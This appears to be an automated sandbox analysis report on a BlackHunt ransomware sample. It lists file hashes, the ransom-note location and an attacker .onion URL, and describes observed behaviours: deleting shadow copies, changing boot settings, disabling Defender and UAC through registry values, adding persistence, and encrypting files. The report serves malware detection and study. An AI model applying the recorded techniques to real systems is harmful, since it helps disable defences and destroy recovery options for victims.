Analysis
-
max time kernel
133s -
max time network
62s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
19-01-2024 00:39
Static task
static1
Behavioral task
behavioral1
Sample
b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe
Resource
win10v2004-20231215-en
General
-
Target
b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe
-
Size
707KB
-
MD5
bc87792299932bf107c31948eea404c3
-
SHA1
15cd4a6a96fc3b4a13fdc9c4e0b929e4ff7f0651
-
SHA256
b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505
-
SHA512
8577b3905b51fb8eb2ba65a9a19e196f7ada6ff305ddcfac8c85e43b561a6075215c450e2c8a78bfb770470f7813f1567cadc463de14cb3e7fdc3b6269a085c4
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1k8evnh:6uaTmkZJ+naie5OTamgEoKxLWHAh
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 1 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 2848 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 844 bcdedit.exe 2680 bcdedit.exe -
Renames multiple (2555) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 2596 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" fsutil.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe -
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\S: b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe File opened (read-only) \??\L: b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe File opened (read-only) \??\B: b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe File opened (read-only) \??\E: b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe File opened (read-only) \??\O: b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe File opened (read-only) \??\J: b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe File opened (read-only) \??\N: b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe File opened (read-only) \??\Y: b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe File opened (read-only) \??\G: b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe File opened (read-only) \??\R: b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe File opened (read-only) \??\P: b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe File opened (read-only) \??\X: b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe File opened (read-only) \??\M: b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\I: b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe File opened (read-only) \??\H: b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe File opened (read-only) \??\Z: b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\V: b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe File opened (read-only) \??\K: b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe File opened (read-only) \??\W: b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe File opened (read-only) \??\T: b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe File opened (read-only) \??\U: b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe File opened (read-only) \??\A: b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe File opened (read-only) \??\Q: b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 2 ip-api.com -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\cmm\PYCC.pf b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata.nl_zh_4.4.0.v20140623020002.jar b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe File created C:\Program Files\VideoLAN\VLC\locale\hi\LC_MESSAGES\#BlackHunt_ReadMe.txt b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\bear_formatted_rgb6.wmv b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Vignette\NavigationRight_SelectionSubpicture.png b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Auckland b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Samarkand b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\plugins.dat b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\#BlackHunt_ReadMe.txt b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\MANIFEST.MF b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\jhall-2.0_05.jar b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Cuiaba b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe File created C:\Program Files\VideoLAN\VLC\locale\hu\LC_MESSAGES\#BlackHunt_ReadMe.hta b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe File created C:\Program Files\VideoLAN\VLC\lua\#BlackHunt_ReadMe.txt b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe File created C:\Program Files\VideoLAN\VLC\plugins\d3d11\#BlackHunt_ReadMe.txt b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\COPYRIGHT b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe File created C:\Program Files\VideoLAN\VLC\locale\fur\LC_MESSAGES\#BlackHunt_ReadMe.txt b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe File created C:\Program Files\VideoLAN\VLC\locale\pl\LC_MESSAGES\#BlackHunt_ReadMe.txt b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\org.eclipse.equinox.simpleconfigurator\#BlackHunt_Private.key b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.rcp.product_5.5.0.165303\feature.xml b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata_2.2.0.v20131211-1531.jar b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-applemenu_ja.jar b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Antarctica\Mawson b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\#BlackHunt_ReadMe.txt b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe File created C:\Program Files\VideoLAN\VLC\locale\hu\#BlackHunt_Private.key b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\#BlackHunt_Private.key b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\St_Johns b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\epl-v10.html b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\epl-v10.html b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.webapp_3.6.300.v20140407-1855.jar b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\#BlackHunt_ReadMe.hta b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.event_1.3.100.v20140115-1647.jar b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-compat.jar b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe File created C:\Program Files\VideoLAN\VLC\locale\ru\LC_MESSAGES\#BlackHunt_ReadMe.hta b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe File created C:\Program Files\VideoLAN\VLC\plugins\audio_mixer\#BlackHunt_ReadMe.txt b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-snaptracer_ja.jar b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+9 b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe File created C:\Program Files\VideoLAN\VLC\locale\sr\#BlackHunt_Private.key b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.emf.ecore_2.10.1.v20140901-1043.jar b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\#BlackHunt_Private.key b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Tegucigalpa b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe File created C:\Program Files\VideoLAN\VLC\lua\intf\modules\#BlackHunt_ReadMe.txt b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\#BlackHunt_Private.key b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe File created C:\Program Files\VideoLAN\VLC\locale\tr\LC_MESSAGES\#BlackHunt_Private.key b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Vignette\#BlackHunt_Private.key b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\shadowonlyframe_selectionsubpicture.png b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Brunei b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.update.configurator.nl_zh_4.4.0.v20140623020002.jar b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Macau b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\feature.xml b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Brunei b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-attach.xml b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Windhoek b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Pontianak b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe File opened for modification C:\Program Files\DVD Maker\audiodepthconverter.ax b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\dt.jar b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.zh_CN_5.5.0.165303.jar b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-ui.xml b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler_ja.jar b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\org.eclipse.update\#BlackHunt_ReadMe.txt b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.flightrecorder_5.5.0.165303\#BlackHunt_ReadMe.txt b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe File opened for modification C:\Program Files\VideoLAN\VLC\README.txt b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Javascripts\#BlackHunt_Private.key b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\#BlackHunt_ReadMe.hta b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2996 schtasks.exe -
Interacts with shadow copies 2 TTPs 5 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 2280 vssadmin.exe 1704 vssadmin.exe 3052 vssadmin.exe 2748 vssadmin.exe 2472 vssadmin.exe -
Modifies registry class 10 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2 reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 schtasks.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ schtasks.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe -
Suspicious use of AdjustPrivilegeToken 13 IoCs
description pid Process Token: SeDebugPrivilege 2436 b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe Token: SeRestorePrivilege 2436 b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe Token: SeBackupPrivilege 2436 b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe Token: SeTakeOwnershipPrivilege 2436 b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe Token: SeAuditPrivilege 2436 b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe Token: SeSecurityPrivilege 2436 b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe Token: SeIncBasePriorityPrivilege 2436 b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe Token: SeBackupPrivilege 2624 vssvc.exe Token: SeRestorePrivilege 2624 vssvc.exe Token: SeAuditPrivilege 2624 vssvc.exe Token: SeBackupPrivilege 1040 wbengine.exe Token: SeRestorePrivilege 1040 wbengine.exe Token: SeSecurityPrivilege 1040 wbengine.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2436 wrote to memory of 2772 2436 b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe 31 PID 2436 wrote to memory of 2772 2436 b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe 31 PID 2436 wrote to memory of 2772 2436 b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe 31 PID 2436 wrote to memory of 2772 2436 b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe 31 PID 2436 wrote to memory of 2588 2436 b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe 33 PID 2436 wrote to memory of 2588 2436 b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe 33 PID 2436 wrote to memory of 2588 2436 b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe 33 PID 2436 wrote to memory of 2588 2436 b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe 33 PID 2772 wrote to memory of 2740 2772 cmd.exe 150 PID 2772 wrote to memory of 2740 2772 cmd.exe 150 PID 2772 wrote to memory of 2740 2772 cmd.exe 150 PID 2436 wrote to memory of 2680 2436 b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe 148 PID 2436 wrote to memory of 2680 2436 b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe 148 PID 2436 wrote to memory of 2680 2436 b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe 148 PID 2436 wrote to memory of 2680 2436 b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe 148 PID 2588 wrote to memory of 2756 2588 cmd.exe 38 PID 2588 wrote to memory of 2756 2588 cmd.exe 38 PID 2588 wrote to memory of 2756 2588 cmd.exe 38 PID 2436 wrote to memory of 2568 2436 b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe 39 PID 2436 wrote to memory of 2568 2436 b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe 39 PID 2436 wrote to memory of 2568 2436 b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe 39 PID 2436 wrote to memory of 2568 2436 b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe 39 PID 2436 wrote to memory of 2596 2436 b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe 142 PID 2436 wrote to memory of 2596 2436 b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe 142 PID 2436 wrote to memory of 2596 2436 b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe 142 PID 2436 wrote to memory of 2596 2436 b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe 142 PID 2680 wrote to memory of 2508 2680 bcdedit.exe 43 PID 2680 wrote to memory of 2508 2680 bcdedit.exe 43 PID 2680 wrote to memory of 2508 2680 bcdedit.exe 43 PID 2436 wrote to memory of 3040 2436 b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe 44 PID 2436 wrote to memory of 3040 2436 b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe 44 PID 2436 wrote to memory of 3040 2436 b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe 44 PID 2436 wrote to memory of 3040 2436 b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe 44 PID 2436 wrote to memory of 2356 2436 b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe 46 PID 2436 wrote to memory of 2356 2436 b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe 46 PID 2436 wrote to memory of 2356 2436 b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe 46 PID 2436 wrote to memory of 2356 2436 b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe 46 PID 2436 wrote to memory of 3056 2436 b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe 48 PID 2436 wrote to memory of 3056 2436 b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe 48 PID 2436 wrote to memory of 3056 2436 b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe 48 PID 2436 wrote to memory of 3056 2436 b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe 48 PID 2436 wrote to memory of 1968 2436 b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe 50 PID 2436 wrote to memory of 1968 2436 b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe 50 PID 2436 wrote to memory of 1968 2436 b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe 50 PID 2436 wrote to memory of 1968 2436 b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe 50 PID 2568 wrote to memory of 2880 2568 cmd.exe 52 PID 2568 wrote to memory of 2880 2568 cmd.exe 52 PID 2568 wrote to memory of 2880 2568 cmd.exe 52 PID 2436 wrote to memory of 2796 2436 b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe 53 PID 2436 wrote to memory of 2796 2436 b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe 53 PID 2436 wrote to memory of 2796 2436 b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe 53 PID 2436 wrote to memory of 2796 2436 b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe 53 PID 2596 wrote to memory of 2848 2596 wbadmin.exe 143 PID 2596 wrote to memory of 2848 2596 wbadmin.exe 143 PID 2596 wrote to memory of 2848 2596 wbadmin.exe 143 PID 2436 wrote to memory of 2668 2436 b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe 55 PID 2436 wrote to memory of 2668 2436 b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe 55 PID 2436 wrote to memory of 2668 2436 b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe 55 PID 2436 wrote to memory of 2668 2436 b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe 55 PID 2436 wrote to memory of 2928 2436 b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe 56 PID 2436 wrote to memory of 2928 2436 b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe 56 PID 2436 wrote to memory of 2928 2436 b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe 56 PID 2436 wrote to memory of 2928 2436 b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe 56 PID 2436 wrote to memory of 2940 2436 b84049e45554c1531fd4d83a8b8eadc6f209d4dcb7a01b1aaf00d498725e3505.exe 58 -
System policy modification 1 TTPs 3 IoCs
